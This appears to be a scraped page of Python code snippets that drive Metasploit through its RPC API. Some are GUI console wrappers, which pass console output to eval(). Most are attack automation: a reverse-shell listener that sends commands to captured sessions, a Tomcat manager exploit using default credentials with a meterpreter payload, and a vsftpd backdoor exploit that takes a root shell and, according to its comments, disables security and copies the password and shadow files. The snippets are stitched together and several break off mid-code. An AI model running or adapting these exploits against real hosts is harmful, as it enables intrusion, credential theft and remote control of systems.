Exemple #1
0
 def _msfInit(self, msfrpc, **kwargs):
     self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'),
                  self._getOutput)
     self.prompt = 'msf >'
     self.c = MsfRpcConsole(msfrpc,
                            sessionid=kwargs.get('sessionid'),
                            cb=self._emitSignal)
     if 'command' in kwargs:
         self.commanderLineEdit.setText(kwargs['command'])
         self.commanderLineEdit.emit(SIGNAL('returnPressed()'))
Exemple #2
0
class MsfShellWindow(QMainWindow, Ui_MainWindow):
    def __init__(self, msfrpc, **kwargs):
        QMainWindow.__init__(self, kwargs.pop('parent', None))
        self.setupUi(self)
        self.setWindowTitle('Metasploit Console')
        self._initCommandLine()
        self._msfInit(msfrpc, **kwargs)

    def _msfInit(self, msfrpc, **kwargs):
        self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'),
                     self._getOutput)
        self.prompt = 'msf >'
        self.c = MsfRpcConsole(msfrpc,
                               sessionid=kwargs.get('sessionid'),
                               cb=self._emitSignal)
        if 'command' in kwargs:
            self.commanderLineEdit.setText(kwargs['command'])
            self.commanderLineEdit.emit(SIGNAL('returnPressed()'))

    def _emitSignal(self, d):
        self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d))

    def _initCommandLine(self):
        self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'),
                     self._sendCommand)
        self.vb = self.outputTextBrowser.verticalScrollBar()

    def _sendCommand(self):
        c = self.outputTextBrowser.textCursor()
        c.movePosition(QTextCursor.End)
        self.outputTextBrowser.setTextCursor(c)
        cmd = str(self.commanderLineEdit.text())
        if cmd == 'exit':
            self.close()
            return
        self.c.execute(cmd)
        self.outputTextBrowser.insertHtml('%s<br>' % cmd)
        self.commanderLineEdit.clear()
        self.vb.setValue(self.vb.maximum())

    def _getOutput(self, d):
        d = eval(str(d))
        self.prompt = d['prompt']
        self.outputTextBrowser.insertPlainText('\n%s\n' % d['data'])
        self.outputTextBrowser.insertHtml(
            '<font color="red"><b>%s</b></font><font color="black">&nbsp;</font>'
            % self.prompt)
        self.vb.setValue(self.vb.maximum())

    def closeEvent(self, event):
        self.c.__del__()
        QMainWindow.close(self)
Exemple #3
0
 def _msfInit(self, msfrpc, **kwargs):
     self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'), self._getOutput)
     self.prompt = 'msf >'
     self.c = MsfRpcConsole(msfrpc, sessionid=kwargs.get('sessionid'),cb=self._emitSignal)
     if 'command' in kwargs:
         self.commanderLineEdit.setText(kwargs['command'])
         self.commanderLineEdit.emit(SIGNAL('returnPressed()'))
Exemple #4
0
    def __init__(self, password, rpcport, listenerport, payload):
        self.interactorclient = MsfRpcClient(password, ssl=False, port=rpcport)

        self.consolebuffer = []
        self.listenerconsole = MsfRpcConsole(self.interactorclient,
                                             cb=self.appendtoconsolebuffer)

        self.listenerconsole.execute('use exploit/multi/handler')
        self.listenerconsole.execute('set PAYLOAD ' + payload)
        self.listenerconsole.execute('set LPORT ' + str(listenerport))
        self.listenerconsole.execute('set LHOST 0.0.0.0')
        self.listenerconsole.execute('set ExitOnSession false')
        self.listenerconsole.execute('exploit -j')

        self.currentsessionid = None
        self.currentshell = None
Exemple #5
0
class MsfShellWindow(QMainWindow, Ui_MainWindow):

    def __init__(self, msfrpc, **kwargs):
        QMainWindow.__init__(self, kwargs.pop('parent', None))
        self.setupUi(self)
        self.setWindowTitle('Metasploit Console')
        self._initCommandLine()
        self._msfInit(msfrpc, **kwargs)

    def _msfInit(self, msfrpc, **kwargs):
        self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'), self._getOutput)
        self.prompt = 'msf >'
        self.c = MsfRpcConsole(msfrpc, sessionid=kwargs.get('sessionid'),cb=self._emitSignal)
        if 'command' in kwargs:
            self.commanderLineEdit.setText(kwargs['command'])
            self.commanderLineEdit.emit(SIGNAL('returnPressed()'))

    def _emitSignal(self, d):
        self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d))

    def _initCommandLine(self):
        self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'), self._sendCommand)
        self.vb = self.outputTextBrowser.verticalScrollBar()

    def _sendCommand(self):
        c = self.outputTextBrowser.textCursor()
        c.movePosition(QTextCursor.End)
        self.outputTextBrowser.setTextCursor(c)
        cmd = str(self.commanderLineEdit.text())
        if cmd == 'exit':
            self.close()
            return
        self.c.execute(cmd)
        self.outputTextBrowser.insertHtml('%s<br>' % cmd)
        self.commanderLineEdit.clear()
        self.vb.setValue(self.vb.maximum())

    def _getOutput(self, d):
        d = eval(str(d))
        self.prompt = d['prompt']
        self.outputTextBrowser.insertPlainText('\n%s\n' % d['data'])
        self.outputTextBrowser.insertHtml('<font color="red"><b>%s</b></font><font color="black">&nbsp;</font>' % self.prompt)
        self.vb.setValue(self.vb.maximum())

    def closeEvent(self, event):
        self.c.__del__()
        QMainWindow.close(self)
def init_metasploit(rhosts):

    config.read('vuln.ini')
    rhosts = rhosts
    vuln =    config['Settings']['VULN']
    threads = config['Settings']['THREADS']
    exploit = config['Settings']['EXPLOIT']

    client = MsfRpcClient('password')

    # cb - callback function, executes when data arrives to console
    console = MsfRpcConsole(client, cb=read_console)

    print("RHOSTS TO USE: " )#+ rhosts)
    print("VULNERABILITY TO CHECK: " + vuln)
    print("THREADS TO USE: " + threads)
    print("EXPLOIT TO USE: " + exploit)

    time.sleep(2)

    return console, rhosts, vuln, threads, exploit
Exemple #7
0
 def __init__(self, password, **kwargs):
     self.fl = True
     self.client = MsfRpcConsole(MsfRpcClient(password, **kwargs), cb=self.callback)
     InteractiveConsole.__init__(self, {'rpc': self.client})
     self.init_history(path.expanduser('~/.msfconsole_history'))
def console_reader(data_in_console):
    status_of_console = data_in_console['busy']
    console_data = data_in_console['data'].rstrip().split('\n')
    for line in console_data:
        if '[+]' in line:
            line_with_positive.append(line)
        elif 'exploit/' in line:
            line_with_exploit.append(line)
        else:
            line_with_out.append(line)

    print status_of_console


client = MsfRpcClient("hocine")
console = MsfRpcConsole(client, cb=console_reader)

#utile.parcer_result_scannig("result_of_scannig.csv")

list_cve = []
list_host_exploit = []
list_temp = list()

hitgh_vul = open("high_vul.csv", "r")
lines = csv.reader(hitgh_vul)
for line in lines:
    list_cve = line[1].split(',')
    line[1] = ""
    for cve in list_cve:
        console.execute("search " + str(cve) + "")
        time.sleep(5)
Exemple #9
0
from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole

client = MsfRpcClient('123456', user='******')

print dir(console)

auxilary = client.modules.auxiliary

for i in auxilary:
    print "\t%s" % i

scan = client.modules.use('auxiliary', 'scanner/ssh/ssh_version')

scan.description

scan.required

scan['VERBOSE'] = True
scan['RHOSTS'] = '192.168.1.119'

print scan.execute()

console = MsfRpcConsole(client)

console.execute('use scanner/ssh/ssh_version')
console.execute('set RHOSTS 192.168.1.119')
console.execute('set VERBOSE True')
console.execute('run')
exploits = client.modules.exploits

for exploit in exploits:
    print("\t%s" % exploit)

scan = client.modules.use('exploits', 'multi/http/tomcat_mgr_deploy')

scan.description

scan.required

scan['RHOST'] = '192.168.100.2'
scan['RPORT'] = '8180'
scan['PATH'] = '/manager'
scan['HttpUsername'] = '******'
scan['HttpPassword'] = '******'
scan['payload'] = 'java/meterpreter/bind_tcp'

print(scan.execute())

console = MsfRpcConsole(client)

console.execute('use exploit/multi/http/tomcat_mgr_deploy')
console.execute('set RHOST 192.168.100.2')
console.execute('set RPORT 8180')
console.execute('set PATH /manager')
console.execute('set HttpUsername tomcat')
console.execute('set HttpPassword tomcat')
console.execute('set payload java/meterpreter/bind_tcp')
console.execute('run')
Exemple #11
0

def read_console(console_data):
    global global_console_status
    global_console_status = console_data['busy']
    if '[+]' in console_data['data']:
        sigdata = console_data['data'].rstrip().split('\n')
        for line in sigdata:
            if '[+]' in line:
                global_positive_out.append(line)


client = MsfRpcClient('password')

# cb - callback function, executes when data arrives to console
console = MsfRpcConsole(client, cb=read_console)
time.sleep(10)

console.execute('use auxiliary/scanner/ftp/ftp_version')
console.execute('set RHOSTS 192.168.0.0/24')
console.execute('set THREADS 20')
console.execute('run')
time.sleep(5)

while global_console_status:
    print 'global_console_status: ' + str(global_console_status)
    time.sleep(5)
time.sleep(5)

targets = list()
for line in global_positive_out:
Exemple #12
0
class MetasploitInteractor():
    def __init__(self, password, rpcport, listenerport, payload):
        self.interactorclient = MsfRpcClient(password, ssl=False, port=rpcport)

        self.consolebuffer = []
        self.listenerconsole = MsfRpcConsole(self.interactorclient,
                                             cb=self.appendtoconsolebuffer)

        self.listenerconsole.execute('use exploit/multi/handler')
        self.listenerconsole.execute('set PAYLOAD ' + payload)
        self.listenerconsole.execute('set LPORT ' + str(listenerport))
        self.listenerconsole.execute('set LHOST 0.0.0.0')
        self.listenerconsole.execute('set ExitOnSession false')
        self.listenerconsole.execute('exploit -j')

        self.currentsessionid = None
        self.currentshell = None

    def writetoconsole(self, data):
        self.listenerconsole.execute(data)

    def appendtoconsolebuffer(self, consoledata):
        self.consolebuffer.append(consoledata)

    def readconsole(self):
        unread = self.consolebuffer
        self.consolebuffer = []
        return unread

    def getsessions(self, verbose=False):
        if verbose:
            return self.interactorclient.sessions.list.items()
        else:
            return [[sessionid, sessionmeta['info'], sessionmeta['username']]
                    for sessionid, sessionmeta in
                    self.interactorclient.sessions.list.items()]

    def sendcommandtosession(self, sessionid, command):

        if sessionid != self.currentsessionid:
            try:
                self.currentshell = self.interactorclient.sessions.session(
                    sessionid)
            except KeyError:
                return "Error, session does not exist"
            self.currentsessionid = sessionid

        try:
            self.currentshell.write(command)
            resp = self.currentshell.read()

        except (metasploit.msfrpc.MsfRpcError, httplib.CannotSendRequest):
            return "Error, session died"

        return resp
from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole
import os
import sys
import string
import time

#connecting to metasploit server
#make sure msdb and postgresql are up
os.system("nmap -v -n -p- 192.168.1.24 > /home/PortsAndPortTypes.txt")
os.system("gnome-terminal -e 'msfrpcd -P abc123 -f -a 127.0.0.1'")
#sleep needed to allow metasploit server to set up
time.sleep(10)
client = MsfRpcClient('abc123', ssl=True, port='55553')
console = MsfRpcConsole(client)

#setting up the use of the exploit and payload
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
exploit['RHOSTS'] = '192.168.1.24'
exploit['VERBOSE'] = True
exploit.execute(payload='cmd/unix/interact')

#sleep needed to allow session(1) (root) to connect to LHOST
time.sleep(15)
#writing the shell commands in root
shell = client.sessions.session(1)
#disabling security
print "Disabling security...\n"
#shell.write("sudo ufw disable\n")
print "Copying the password file...\n"
print "Copying the shadow password file...\n"